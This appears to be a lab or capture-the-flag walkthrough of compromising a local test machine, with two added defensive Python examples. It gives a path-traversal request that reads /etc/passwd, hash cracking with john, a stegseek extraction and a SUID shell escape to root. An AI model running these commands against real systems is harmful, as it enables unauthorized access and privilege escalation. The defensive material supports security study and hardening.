-
I start with a scan of all TCP ports to find the open ones.
nmap -p- --open -vvv -sS --min-rate 5000 -Pn 192.168.56.106 -oG scan

-
Scanning the open ports with version detection and the default scripts.
nmap -p80,1337,12320,12321,12322 -sCV 192.168.56.106 -oN ports

-
I look at what technologies the websites are using.
whatweb http://192.168.56.106/
whatweb https://192.168.56.106:1337/
whatweb https://192.168.56.106:12320/
whatweb https://192.168.56.106:12322/

-
I access the different web pages to get a first impression of them, in case I see something peculiar.

-
I check the port scan again and see a robots.txt on port 12322, so I take a look at it.

-
When I open file_view.php, it tells me that there is a parameter with which we can possibly read internal files (LFI).

-
After trying different ways to pass the parameter, I find that it has to be sent in the body of a POST request (curl's -X sets the request method).
curl -k -X POST "https://192.168.56.106/file_view.php" -d "../../../../../../../../../../../etc/hosts" 2>/dev/null
curl -k -X POST "https://192.168.56.106/file_view.php" -d "../../../../../../../../../../../etc/passwd" 2>/dev/null | grep -v "/bin/false" | grep -v "nolog"
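
As an added defensive example (not code from the original write-up), this is the path containment check that a file-viewing endpoint like file_view.php needs in order to refuse the traversal body used above. It is written in Python rather than PHP so it runs stand-alone; the web root, the file names and the symlink are constructed for the demo, and the long `../` string is the one sent in the request above. Resolving with realpath before comparing also covers the symlink and absolute-path variants, which a plain substring check misses.

```python
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a requested path would escape the allowed base directory."""


def resolve_within(base_dir: str, requested: str) -> str:
    """Return the real path of `requested` only if it stays inside `base_dir`."""
    # NUL bytes (the old PHP truncation trick) and absolute paths are rejected outright.
    if "\x00" in requested or os.path.isabs(requested):
        raise PathTraversalError(requested)
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath compares after '..' segments and symlinks are resolved,
    # so "/var/www-old" cannot pass as a child of "/var/www" the way startswith() allows.
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(requested)
    return candidate


def read_file_safely(base_dir: str, requested: str, max_bytes: int = 64 * 1024) -> bytes:
    """Read a file under base_dir, refusing anything that resolves outside it."""
    path = resolve_within(base_dir, requested)
    if not os.path.isfile(path):
        raise FileNotFoundError(requested)
    with open(path, "rb") as fh:
        return fh.read(max_bytes)


def demo() -> dict:
    """Build a throw-away web root (constructed) and exercise the check with constructed requests."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "www")
        os.makedirs(webroot)
        with open(os.path.join(webroot, "notes.txt"), "w") as fh:
            fh.write("public content")
        # A file outside the web root, standing in for /etc/passwd.
        with open(os.path.join(root, "secret.txt"), "w") as fh:
            fh.write("root:x:0:0")
        # A symlink inside the web root that points outside it.
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(webroot, "link"))

        cases = {
            "legit": "notes.txt",
            "traversal": "../../../../../../../../../../../etc/passwd",  # body from the write-up
            "short_traversal": "../secret.txt",
            "absolute": "/etc/passwd",
            "symlink_escape": "link",
            "nul": "notes.txt\x00.jpg",
        }
        for name, req in cases.items():
            try:
                results[name] = read_file_safely(webroot, req).decode()
            except PathTraversalError:
                results[name] = "blocked"
            except FileNotFoundError:
                results[name] = "missing"
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:16} -> {outcome}")
```

Only the legitimate request returns content; every other case in demo() is reported as blocked, including the symlink that a naive check would happily follow.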


-
I find two users, n30 and testuser. I try to access port 12320 using the same username and password, and I manage to log in with testuser.

-
I check the files inside the web root and find a possible credential.

-
I use an online hash identifier ("Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online") to see what kind of hash this string might be.

-
I try to crack the password with john using the md5crypt hash format. It gives me a possible password.
john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=md5crypt

-
I use the credentials found to access the web page on port 1337. At first glance I don't see anything interesting, but on reviewing the source code I find a comment referring to an image.

-
I start a Python HTTP server on port 8000 (the default for http.server) to download the image to my machine. The server speaks plain HTTP, so the download URL must use http://.
python3 -m http.server
wget http://192.168.56.106:8000/h1dd3n.jpg

-
I try to look at the text strings in the photo but find nothing interesting, so I try stegseek and get a possible password.

-
I use the password with the user n30 and manage to pivot to that user.

-
I check the bash history of this user and find a strange command; I see that the binary it runs has the SUID permission.

-
I run it and become root.
/usr/bin/morpheus 'BEGIN {system("/bin/sh")}'
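
As an added defensive example (not part of the original write-up): a setuid/setgid audit that compares the privileged binaries on a host against a known-good baseline, which is the check that would have flagged /usr/bin/morpheus, a renamed interpreter that appears on no stock baseline. The allowlist and the file entries below are constructed for the demo; scan_tree() yields the same (path, mode) pairs from a real filesystem so the same function can be run against a live host.

```python
import os
import stat

# Constructed allowlist for illustration; a real baseline is recorded from a known-good image.
EXPECTED_SETUID = frozenset({"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"})


def is_privileged(mode: int) -> bool:
    """True if the mode carries the setuid or setgid bit."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def unexpected_privileged(entries, allowlist=EXPECTED_SETUID):
    """Return sorted paths of regular files with setuid/setgid that are not on the allowlist.

    `entries` is any iterable of (path, st_mode) pairs, so the function can be fed
    either constructed data (as below) or the output of scan_tree().
    """
    return sorted(
        path
        for path, mode in entries
        if stat.S_ISREG(mode) and is_privileged(mode) and path not in allowlist
    )


def scan_tree(root: str):
    """Walk a real filesystem and yield (path, st_mode) for every file found."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                # lstat: a symlink's own mode is reported, the target is not followed.
                yield path, os.lstat(path).st_mode
            except OSError:
                continue


# Constructed directory listing standing in for a scan of /usr/bin on the box.
CONSTRUCTED_ENTRIES = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755),
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755),
    ("/usr/bin/morpheus", stat.S_IFREG | 0o4755),  # the binary from the write-up; mode constructed
    ("/usr/bin/awk", stat.S_IFREG | 0o755),        # no special bits, should not be reported
    ("/usr/bin", stat.S_IFDIR | 0o755),            # directories are ignored
]


if __name__ == "__main__":
    for path in unexpected_privileged(CONSTRUCTED_ENTRIES):
        print("unexpected setuid/setgid binary:", path)
```

Against the constructed listing only /usr/bin/morpheus is reported; on a real host, run unexpected_privileged(scan_tree("/usr")) and treat any result that is not a packaged, documented setuid program as a finding.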
